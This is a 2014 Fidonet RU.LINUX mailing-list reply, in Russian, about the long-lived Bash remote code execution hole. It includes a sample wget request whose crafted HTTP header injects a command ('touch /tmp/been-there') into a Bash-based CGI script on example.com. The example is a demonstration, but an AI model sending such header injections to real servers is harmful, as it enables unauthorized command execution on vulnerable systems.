Добро пожаловать, Гость. Пожалуйста авторизуйтесь здесь.

	Введите FGHI ссылку: Присутствуют сообщения из эхоконференции RU.LINUX с датами от 24 Jan 02 06:01:34 до 04 Jul 24 23:16:10, всего сообщений: 8504 Ответить на сообщение К списку сообщений Предыдущее сообщение Следующее сообщение = Сообщение: 1495 из 8504 ========================================= RU.LINUX = От   : Ivan Shmakov                     2:5020/400         26 Sep 14 04:00:33 Кому : Oleg Redut                                          26 Sep 14 04:00:33 Тема : Re: http://www.securitylab.ru/news/458760.php FGHI : area://RU.LINUX?msgid=<1187494952@violet.siamics.net>+9ad65fa1 На   : area://RU.LINUX?msgid=2:5000/111+5423cb6d = Кодировка сообщения определена как: CP866 ================================== ============================================================================== From: Ivan Shmakov <ivan@violet.siamics.net> >>>>> "OR" == Oleg Redut <Oleg.Redut@f111.n5000.z2.fidonet.org> writes: >>>>> Доброе (current) время суток, Alexey! >>> Просуществовавшая в течение 22 лет брешь позволяет удаленно >>> выполнить код. AV> Все знают? OR> И пользуются многие годы... Пользоваться, положим, можно по-разному.  Hеприятно удивило, что подобный нижеследующему запрос к HTTP-серверу может привести к неожиданным последствиям, если bar.cgi вдруг оказывается программой на Bash, или вызывает Bash для каких-то своих нужд. $ wget -O /dev/full \       --header='Foo: () { : ; } ; touch -- /tmp/been-there ;' \       -- http://example.com/bar.cgi -- FSF associate member #7257  http://boycottsystemd.org/  \xE2\x80\xA6 3013 B6A0 230E 334A --- ifmail v.2.15dev5.4 * Origin: Aioe.org NNTP Server (2:5020/400) К главной странице гейта

Powered by NoSFeRaTU`s FGHIGate
Открытие страницы: 0.060769 секунды